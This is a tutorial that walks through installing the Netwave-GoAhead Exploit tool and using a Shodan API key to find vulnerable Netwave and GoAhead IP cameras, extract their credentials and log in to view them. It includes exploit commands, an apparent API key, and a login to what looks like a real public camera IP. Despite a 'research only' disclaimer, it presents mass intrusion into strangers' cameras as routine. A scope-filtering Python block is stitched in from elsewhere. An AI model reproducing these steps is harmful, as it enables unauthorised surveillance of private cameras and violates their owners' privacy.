How to use Netwave-GoAhead Exploit to exploit security camera vulnerabilities

In the lesson “Exercise: Using ZoomEye to access Cameras with vulnerabilities CVE-2018-9995” we saw that cameras with unpatched vulnerabilities are easy to find. Another tool, Netwave-GoAhead Exploit, helps find a different type of vulnerable security camera.

About Tools

This tool was created and developed by Kien Quoc. Its main function is to find IP addresses and check two types of camera, Netwave IP and GoAhead, for vulnerabilities. From there you can hack into the camera and view it through your browser.

Instructions on how to use Netwave-GoAhead Exploit

Note: this article is for research purposes only. Using it for illegal purposes is strictly forbidden. If a camera is found to be vulnerable, please notify the owner immediately so that it can be fixed quickly.

Install tools

Step 1: Update your Linux system and install Python 3 and pip3

sudo apt update
sudo apt install -y python3
(The latest version when this article was published was 3.9.6. You can check the current one on Python’s homepage.)
sudo apt-get update
sudo apt-get -y install python3-pip

Step 2: Install the Netwave-GoAhead Exploit tool

git clone https://github.com/kienquoc102/Netwave-GoAhead-Exploits

Step 3: Go into the directory and install the necessary packages

cd Netwave-GoAhead-Exploits

pip3 install -r ./related.txt

Register an account in Shodan.io

Shodan.io is a search engine that lets users find specific types of computers connected to the Internet using various filters. In this article, Shodan acts as an IP finder and filter that shows which IPs can be attacked.

Step 1: Go to Shodan.io

Step 2: Select SIGN UP NOW

Step 3: Select Register in the upper corner

Step 4: Enter login information

Step 5: Go to your email and verify your account with Shodan.io

Step 6: Go to account.shodan.io.

Note the API key shown there.

Find Vulnerable Cameras with Shodan API key

Enter the following command

python3 exploit.py -b 2 -v --shodan [enter your Shodan API key here]

My example would be

python3 exploit.py -b 2 -v --shodan rrgYhgIMtnrPtfKdiVvWKtyQyY94goA0

It will run as follows:

[Screenshot: the tool running]

You just need to wait until it gives results like these:

[Screenshot: camera search results]

Now I will try to log in to IP address 181.56.97.61 on port 80.

You will be prompted to enter a username and password. Enter the ones the tool reported.

An example of this would be

  • Username: admin
  • Password: 123456

Result

[Screenshot: camera hacking results]

Sometimes you will encounter some cases like this

[+]The ip:192.168.120.1,port:81,username:Location: /admin (Example IP)
[+]The ip:192.168.120.1,port:81,password:<meta name="generator" content="vBulletin 5.5.4" />

Discard results like this: the address is not the IP address of a camera. The “username” and “password” fields contain fragments of an ordinary web page, not credentials.

Access Camera using available IP

With a single IP address and port

Run the following command

python3 exploit.py -b 1 -i [IP:PORT] -v

For example, I have

python3 exploit.py -b 1 -i 192.168.1.5:80 -v

Where:

IP address is 192.168.1.5

Port is 80

With a list of IP addresses and ports

Use the following command

python3 exploit.py -b 2 -l iplist.txt -v

Where:

iplist.txt is the file containing the IP addresses in the form: [IP:PORT]

E.g.: 192.168.1.5:80

Target IP: 192.168.1.5

Target port: 80

This makes it easy to attack an address that you already know, and if you have an IP list available, checking it this way is very effective. Using Shodan is also possible, but it will check many unfamiliar IPs that have been published on the Internet.
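When the list is built to audit cameras you administer, each entry of iplist.txt can be validated and checked against the address ranges you are authorised to test before the file is used. This is an added example, not part of the original article or of the Netwave-GoAhead Exploit tool; the function names, the scope ranges and the sample entries are assumptions.

```python
import ipaddress

# Assumption: ranges the tester administers or is authorised to audit (constructed).
AUTHORISED_SCOPE = ["192.168.1.0/24", "10.20.0.0/16"]

def parse_entry(line):
    """Parse one 'IP:PORT' entry; return (IPv4Address, port) or raise ValueError."""
    host, sep, port = line.strip().rpartition(":")
    if not sep or not port.isdigit():
        raise ValueError(f"not in IP:PORT form: {line!r}")
    port_num = int(port)
    if not 1 <= port_num <= 65535:
        raise ValueError(f"port out of range: {line!r}")
    # IPv4Address raises a ValueError subclass on a malformed address.
    return ipaddress.IPv4Address(host), port_num

def filter_in_scope(lines, scope=AUTHORISED_SCOPE):
    """Return (in_scope, rejected); rejected holds (entry, reason) tuples."""
    networks = [ipaddress.ip_network(cidr) for cidr in scope]
    in_scope, rejected, seen = [], [], set()
    for raw in lines:
        entry = raw.strip()
        if not entry or entry.startswith("#"):
            continue  # skip blank lines and comments
        try:
            addr, port = parse_entry(entry)
        except ValueError as exc:
            rejected.append((entry, str(exc)))
            continue
        if not any(addr in net for net in networks):
            rejected.append((entry, "outside authorised scope"))
        elif (addr, port) in seen:
            rejected.append((entry, "duplicate"))
        else:
            seen.add((addr, port))
            in_scope.append(f"{addr}:{port}")
    return in_scope, rejected

# Constructed sample input in the iplist.txt format described above.
SAMPLE = ["192.168.1.5:80", "192.168.1.5:80", "192.168.120.1:81",
          "203.0.113.7:80", "192.168.1.9", "192.168.1.300:81", "10.20.3.4:70000"]

if __name__ == "__main__":
    keep, drop = filter_in_scope(SAMPLE)
    print("\n".join(keep))
    for entry, reason in drop:
        print(f"# rejected {entry}: {reason}")
```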

That concludes the tutorial on how to find and attack cameras with this Python tool. If you have a good article, don’t hesitate to send a contribution via email to anonyviet.com@gmail.com, and we will edit and post it. See also: Exercise: Use ZoomEye to find the vulnerable Camera CVE-2018-9995.